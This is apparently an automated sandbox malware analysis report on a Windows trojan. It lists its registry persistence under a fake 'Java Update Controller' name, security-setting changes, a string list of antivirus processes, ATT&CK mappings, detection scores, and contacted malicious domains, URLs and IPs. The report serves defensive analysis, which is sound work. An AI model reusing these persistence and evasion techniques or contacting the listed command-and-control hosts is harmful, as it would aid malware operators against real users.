Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId

Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\Java Update Controller\935aa375omok5c.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\LVCHlGQXfkIOYpbmPccpxcWUcKcoFKQFklxbbasmlNfbBesaRuTlmZKqvvAZEkKvLmClHTJw\gGRiqYglIOLbY.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe

Code function: 0_2_0046F11C GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_0046F11C

Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe

Code function: 0_2_0046CEB9 __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,__invoke_watson,__invoke_watson,

0_2_0046CEB9

Lowering of HIPS / PFW / Operating System Security Settings:

Modifies Internet Explorer zone settings

Show sources

Source: C:\Windows\SysWOW64\explorer.exe	Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 2500	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 2500	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 2500	Jump to behavior

Source: 935aa375omok5c.exe	Binary or memory string: Firewall\GDFwSvc.exe
Source: 935aa375omok5c.exe	Binary or memory string: Windows Defender\MSASCui.exe
Source: 935aa375omok5c.exe	Binary or memory string: mcagent.exe
Source: 935aa375omok5c.exe	Binary or memory string: AVKTray\AVKTray.exe
Source: 935aa375omok5c.exe	Binary or memory string: avcenter.exe
Source: 935aa375omok5c.exe	Binary or memory string: cfp.exe
Source: 935aa375omok5c.exe	Binary or memory string: SBAMTray.exe
Source: 935aa375omok5c.exe	Binary or memory string: sched.exe
Source: 935aa375omok5c.exe	Binary or memory string: mcshield.exe
Source: 935aa375omok5c.exe	Binary or memory string: AVK\AVKService.exe
Source: 935aa375omok5c.exe	Binary or memory string: Firewall\GDFirewallTray.exe
Source: 935aa375omok5c.exe	Binary or memory string: avgui.exe
Source: 935aa375omok5c.exe	Binary or memory string: avgwdsvc.exe
Source: 935aa375omok5c.exe	Binary or memory string: pctsSvc.exe
Source: 935aa375omok5c.exe	Binary or memory string: avgupd.exe
Source: 935aa375omok5c.exe	Binary or memory string: MsMpEng.exe
Source: 935aa375omok5c.exe	Binary or memory string: mcupdate.exe
Source: 935aa375omok5c.exe	Binary or memory string: a2service.exe
Source: 935aa375omok5c.exe	Binary or memory string: pctsAuxs.exe
Source: 935aa375omok5c.exe	Binary or memory string: MSASCui.exe
Source: 935aa375omok5c.exe	Binary or memory string: avguard.exe
Source: 935aa375omok5c.exe	Binary or memory string: BullGuard.exe
Source: 935aa375omok5c.exe	Binary or memory string: avp.exe
Source: 935aa375omok5c.exe	Binary or memory string: pctsGui.exe
Source: 935aa375omok5c.exe	Binary or memory string: AVENGINE.exe
Source: 935aa375omok5c.exe	Binary or memory string: a2start.exe
Source: 935aa375omok5c.exe	Binary or memory string: avgnt.exe
Source: 935aa375omok5c.exe	Binary or memory string: FPWin.exe
Source: 935aa375omok5c.exe	Binary or memory string: procexp.exe
Source: 935aa375omok5c.exe	Binary or memory string: a2guard.exe
Source: 935aa375omok5c.exe	Binary or memory string: mbam.exe
Source: 935aa375omok5c.exe	Binary or memory string: RavMonD.exe
Source: 935aa375omok5c.exe	Binary or memory string: sbamui.exe
Source: 935aa375omok5c.exe	Binary or memory string: op_mon.exe
Source: 935aa375omok5c.exe	Binary or memory string: FProtTray.exe

Source: C:\Users\user\Desktop\144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\935aa375omok5c.exe DisableExceptionChainValidation

Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe	File opened / queried: C:\Users\user\AppData\Roaming\.minecraft			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened / queried: C:\Program Files (x86)\League of Legends			Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	LSASS Driver1	LSASS Driver1	Disable or Modify Tools11	Input Capture1	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Shared Modules1	Image File Execution Options Injection1	Image File Execution Options Injection1	Deobfuscate/Decode Files or Information1	LSASS Memory	System Information Discovery152	Remote Desktop Protocol	Man in the Browser1	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Registry Run Keys / Startup Folder11	Process Injection412	Obfuscated Files or Information2	Security Account Manager	Security Software Discovery451	SMB/Windows Admin Shares	Data from Local System1	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Registry Run Keys / Startup Folder11	Software Packing21	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture1	Scheduled Transfer	Application Layer Protocol14	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	Virtualization/Sandbox Evasion231	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion231	Cached Domain Credentials	Application Window Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection412	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Hidden Files and Directories1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	63%	Virustotal		Browse
144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	67%	ReversingLabs	Win32.Trojan.Strictor
144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	100%	Avira	HEUR/AGEN.1104900
144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
11.2.explorer.exe.50000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
28.2.935aa375omok5c.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
24.2.935aa375omok5c.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
22.2.935aa375omok5c.exe.21b0000.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
26.2.935aa375omok5c.exe.1fb0000.2.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
22.2.935aa375omok5c.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
24.0.935aa375omok5c.exe.400000.0.unpack	100%	Avira	TR/Patched.Gen	Download File
22.0.935aa375omok5c.exe.400000.0.unpack	100%	Avira	TR/Patched.Gen	Download File
28.0.935aa375omok5c.exe.400000.0.unpack	100%	Avira	TR/Patched.Gen	Download File
22.2.935aa375omok5c.exe.2200000.2.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
24.2.935aa375omok5c.exe.4c0000.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.2.144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe.6a0000.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
24.2.935aa375omok5c.exe.a50000.2.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.0.144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe.400000.0.unpack	100%	Avira	TR/Patched.Gen	Download File
26.2.935aa375omok5c.exe.7b0000.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
28.2.935aa375omok5c.exe.4c0000.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.3.144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe.28d0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
26.2.935aa375omok5c.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
0.2.144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe.28d0000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe.6e0000.2.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
28.2.935aa375omok5c.exe.520000.2.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.2.144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
26.0.935aa375omok5c.exe.400000.0.unpack	100%	Avira	TR/Patched.Gen	Download File

Domains

Source	Detection	Scanner	Link
xircus.ws	6%	Virustotal	Browse
firecrackers.ru	3%	Virustotal	Browse
cooperal.ru	1%	Virustotal	Browse
mockupery.ru	3%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://r3.i.lencr.org/0/	0%	Avira URL Cloud	safe
https://firecrackers.ru/r	0%	Avira URL Cloud	safe
http://firecrackers.ru/kin/logout.php?page=23	0%	Avira URL Cloud	safe
https://firecrackers.ru/kin/logout.php	0%	Avira URL Cloud	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
http://firecrackers.ru/kin/logout.php?id=5477845ers	0%	Avira URL Cloud	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
http://firecrackers.ru/kin/logout.php?id=6303254R	0%	Avira URL Cloud	safe
https://firecrackers.ru/kin/logout.php?id=6303254p	0%	Avira URL Cloud	safe
http://firecrackers.ru/kin/logout.php?id=5477845	0%	Avira URL Cloud	safe
https://firecrackers.ru/f	0%	Avira URL Cloud	safe
https://firecrackers.ru/kin/logout.php?id=6303254	0%	Avira URL Cloud	safe
http://firecrackers.ru/kin/logout.php	0%	Avira URL Cloud	safe
http://xircus.ws/kin/logout.php?id=5447518	0%	Avira URL Cloud	safe
http://firecrackers.ru/kin/logout.php?id=6303254	0%	Avira URL Cloud	safe
http://xircus.ws/kin/logout.php	0%	Avira URL Cloud	safe
https://firecrackers.ru/kin/logout.php?id=5477845	0%	Avira URL Cloud	safe
https://firecrackers.ru/	0%	Avira URL Cloud	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://firecrackers.ru/kin/logout.php?pid=660	0%	Avira URL Cloud	safe
http://xircus.ws/kin/logout.php3F	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
xircus.ws	64.70.19.203	true	true	6%, Virustotal, Browse	unknown
firecrackers.ru	91.234.34.80	true	true	3%, Virustotal, Browse	unknown
cooperal.ru	unknown	unknown	true	1%, Virustotal, Browse	unknown
mockupery.ru	unknown	unknown	true	3%, Virustotal, Browse	unknown
flamable.ru	unknown	unknown	true		unknown
blobbb.ru	unknown	unknown	true		unknown
xircus.one	unknown	unknown	true		unknown
ghostlyy.ru	unknown	unknown	true		unknown
crustbuster.ru	unknown	unknown	true		unknown
xircus.org.ru	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://firecrackers.ru/kin/logout.php?page=23	true	Avira URL Cloud: safe	unknown
http://firecrackers.ru/kin/logout.php?id=5477845	true	Avira URL Cloud: safe	unknown
http://firecrackers.ru/kin/logout.php	true	Avira URL Cloud: safe	unknown
http://xircus.ws/kin/logout.php?id=5447518	true	Avira URL Cloud: safe	unknown
http://firecrackers.ru/kin/logout.php?id=6303254	true	Avira URL Cloud: safe	unknown
http://xircus.ws/kin/logout.php	true	Avira URL Cloud: safe	unknown
http://firecrackers.ru/kin/logout.php?pid=660	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://r3.i.lencr.org/0/	explorer.exe, 0000000B.00000003.557823867.00000000007F2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://firecrackers.ru/r	explorer.exe, 0000000B.00000002.735822276.00000000007AE000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://firecrackers.ru/kin/logout.php	explorer.exe, 0000000B.00000003.566927736.00000000007DC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://cps.letsencrypt.org0	explorer.exe, 0000000B.00000003.557823867.00000000007F2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://x1.c.lencr.org/0	explorer.exe, 0000000B.00000003.566857785.00000000007D4000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	explorer.exe, 0000000B.00000003.566857785.00000000007D4000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://firecrackers.ru/kin/logout.php?id=5477845ers	explorer.exe, 0000000B.00000002.735822276.00000000007AE000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://r3.o.lencr.org0	explorer.exe, 0000000B.00000003.557823867.00000000007F2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://firecrackers.ru/kin/logout.php?id=6303254R	explorer.exe, 0000000B.00000002.735822276.00000000007AE000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://firecrackers.ru/kin/logout.php?id=6303254p	explorer.exe, 0000000B.00000002.735822276.00000000007AE000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://firecrackers.ru/f	explorer.exe, 0000000B.00000002.735822276.00000000007AE000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://firecrackers.ru/kin/logout.php?id=6303254	explorer.exe, 0000000B.00000002.735822276.00000000007AE000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://firecrackers.ru/kin/logout.php?id=5477845	explorer.exe, 0000000B.00000002.735822276.00000000007AE000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://firecrackers.ru/	explorer.exe, 0000000B.00000002.735822276.00000000007AE000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://cps.root-x1.letsencrypt.org0	explorer.exe, 0000000B.00000003.579179984.00000000007F2000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://xircus.ws/kin/logout.php3F	explorer.exe, 0000000B.00000003.610269971.00000000007DC000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
64.70.19.203	xircus.ws	United States		3561	CENTURYLINK-LEGACY-SAVVISUS	true
91.234.34.80	firecrackers.ru	Ukraine		56485	THEHOST-ASUA	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	457488
Start date:	01.08.2021
Start time:	13:03:17
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.phis.evad.winEXE@7/7@24/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 2.3% (good quality ratio 2.3%) Quality average: 96.8% Quality standard deviation: 7.4%
HCA Information:	Successful, ratio: 98% Number of executed functions: 51 Number of non-executed functions: 32
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 13.88.21.125, 168.61.161.212, 20.82.210.154, 23.211.4.86, 40.112.88.60, 173.222.108.210, 173.222.108.226, 51.103.5.186, 20.82.209.183, 80.67.82.211, 80.67.82.235, 40.126.31.141, 40.126.31.8, 20.190.159.134, 40.126.31.143, 20.190.159.132, 40.126.31.135, 40.126.31.6, 40.126.31.1, 20.50.102.62, 52.185.71.28, 20.54.110.249 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, update.microsoft.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, redir.update.microsoft.com.nsatc.net, client.wns.windows.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, www.tm.a.prd.aadg.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, login.msa.msidentity.com, ris.api.iris.microsoft.com, www.update.microsoft.com.nsatc.net, update.microsoft.com.nsatc.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtEnumerateKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:05:01	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Java Update Controller C:\ProgramData\Java Update Controller\935aa375omok5c.exe
13:05:04	API Interceptor	10x Sleep call for process: gGRiqYglIOLbY.exe modified
13:05:09	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Java Update Controller "C:\ProgramData\Java Update Controller\935aa375omok5c.exe"
13:05:17	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Java Update Controller C:\ProgramData\Java Update Controller\935aa375omok5c.exe
13:05:25	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Java Update Controller "C:\ProgramData\Java Update Controller\935aa375omok5c.exe"
13:06:45	API Interceptor	20x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
64.70.19.203	Br6Pmt0MiZ.exe	Get hash	malicious	Browse	thaus.ws/6
	R5JbUb3muW.exe	Get hash	malicious	Browse	thaus.ws/6
	kmHFEwF36g.exe	Get hash	malicious	Browse	thaus.ws/1
	VkTXaNHTs6.exe	Get hash	malicious	Browse	eaffuebudbeudbbk.ws/6
	wNtMSZRvzI.exe	Get hash	malicious	Browse	eafuebdbedbedggk.ws/4
	y7ddF1vGqA.exe	Get hash	malicious	Browse	deauduafzgezzfgk.ws/3
	6FRRo6QFF2.exe	Get hash	malicious	Browse	wduufbaueeubffgu.ws/5
	Photo-149-101.jpg.exe	Get hash	malicious	Browse	304049943.ws/mailer/3
	winsvcs.exe	Get hash	malicious	Browse	304049943.ws/mailer/3
	Photo-137-158.jpg.exe	Get hash	malicious	Browse	304049943.ws/mailer/3
	9v7gUCpZOr.exe	Get hash	malicious	Browse	eaffuebudbeudbbu.ws/2
	1rP65UzlyY.exe	Get hash	malicious	Browse	eaffuebudbeudbbu.ws/5
	JAGk3xeQ5I.exe	Get hash	malicious	Browse	geueudusl.ws/vnc/2
	SecuriteInfo.com.Trojan.Siggen10.14421.6375.exe	Get hash	malicious	Browse	fheuhdwdzwgzdggu.ws/2
	SecuriteInfo.com.Trojan.Siggen10.14421.24699.exe	Get hash	malicious	Browse	wduufbaueeubffgr.ws/2
	jHbg4HhuFN.exe	Get hash	malicious	Browse	deauduafzgezzfgr.ws/5
	Olalq9sdOF.exe	Get hash	malicious	Browse	tpleflpokadkeoot.ws/pe/1
	http://aptekanasza.home.pl	Get hash	malicious	Browse	r.mega-us-pills.ws/?snitch&se_referrer=&default_keyword=Apteka%20Nasza&keyword=Apteka%20Nasza

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CENTURYLINK-LEGACY-SAVVISUS	uiInKzkLQx	Get hash	malicious	Browse	205.217.186.77
	SecuriteInfo.com.Linux.Mirai.27.23761.13200	Get hash	malicious	Browse	207.2.202.206
	vhTZ5hgW6j	Get hash	malicious	Browse	208.160.46.222
	e5q6xjMRES	Get hash	malicious	Browse	165.193.85.12
	sEpm2xTkk2	Get hash	malicious	Browse	208.171.240.251
	ZXuptcXTmx	Get hash	malicious	Browse	208.128.49.119
	qBkJfZZTh3	Get hash	malicious	Browse	208.133.37.237
	8gQIIxr1sN	Get hash	malicious	Browse	91.223.255.59
	s886FbF8oJ	Get hash	malicious	Browse	208.165.139.46
	7oxDB35HHz	Get hash	malicious	Browse	207.124.70.152
	YI0XrjWISi	Get hash	malicious	Browse	206.155.137.21
	UcEBQV1ZS7	Get hash	malicious	Browse	64.242.80.29
	Kot8HtIH3m	Get hash	malicious	Browse	206.134.246.18
	bZeeXPyRJc	Get hash	malicious	Browse	206.26.161.141
	5tofauAltQ	Get hash	malicious	Browse	208.147.74.138
	f3sOoHxrdm	Get hash	malicious	Browse	63.132.44.198
	j1zDAEIWib	Get hash	malicious	Browse	208.164.254.4
	9sM8XHr0qD	Get hash	malicious	Browse	208.172.16.90
	skhubz22bY	Get hash	malicious	Browse	63.128.71.36
	aX43GPM2o2	Get hash	malicious	Browse	206.134.234.95
THEHOST-ASUA	0wagQPl5bl	Get hash	malicious	Browse	45.154.118.84
	http://yfnyblv.yobinsetio.site/	Get hash	malicious	Browse	91.223.180.112
	PAYMENT.doc	Get hash	malicious	Browse	91.234.33.4
	QU7i2u6RYE.doc	Get hash	malicious	Browse	176.114.0.75
	P4HBL1Na6a.doc	Get hash	malicious	Browse	176.114.0.75
	YITp7ZNXMz.doc	Get hash	malicious	Browse	176.114.0.75
	phieMae1yj.doc	Get hash	malicious	Browse	176.114.0.75
	FRj2sPkmXc.doc	Get hash	malicious	Browse	176.114.0.75
	r35Y0LrDQF.doc	Get hash	malicious	Browse	176.114.0.75
	DLhV3GbEbd.doc	Get hash	malicious	Browse	176.114.0.75
	6IZr7cDmaG.doc	Get hash	malicious	Browse	176.114.0.75
	oYulBoKB4L.doc	Get hash	malicious	Browse	176.114.0.75
	OuD1UXfxyt.doc	Get hash	malicious	Browse	176.114.0.75
	Ax9LVlOrm2.doc	Get hash	malicious	Browse	176.114.0.75
	3NwJzj2jPj.doc	Get hash	malicious	Browse	176.114.0.75
	clj6rlbeg3.doc	Get hash	malicious	Browse	176.114.0.75
	ZJpTuMHlyc.doc	Get hash	malicious	Browse	176.114.0.75
